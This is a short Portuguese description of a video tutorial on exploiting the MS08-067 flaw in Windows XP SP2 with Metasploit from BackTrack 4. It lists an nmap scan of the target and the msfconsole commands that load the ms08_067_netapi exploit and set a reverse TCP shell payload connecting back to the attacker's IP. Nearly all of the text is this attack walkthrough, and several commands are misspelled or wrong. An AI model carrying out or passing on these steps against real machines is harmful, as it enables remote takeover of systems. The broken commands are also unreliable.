Nessa video aula mostro como usar o metasploit para explorar falha de segurança no sistema operacional Windows XP profissional sp2, que permite execução remota.
Programas usados:
Metasploit framework 3 > http://www.metasploit.com
Nmap > http://nmap.org
Exploit usado:
ms08_067_netapi
Payload(carga) usado:
shell_reverse_tcp
Tudo encontrado no BackTrack 4.
Solução da falha:Clique aqui
Comandos:
nmap -sS -O Ip_do_alvo
cd /pentest/exploits/framework3
./msfconsole
show exploits
use windown/smb/ms08_067_netapi
show options
set rhots IP_do_alvo
set rport Porta
set payload /windows/shell/reverse_tcp
set lhost Meu_IP
set id "0" (0 e para encontrar o windows automaticamente, caso não encontre, digitar "info" vai ter o id de vários windows)
exploit
Download: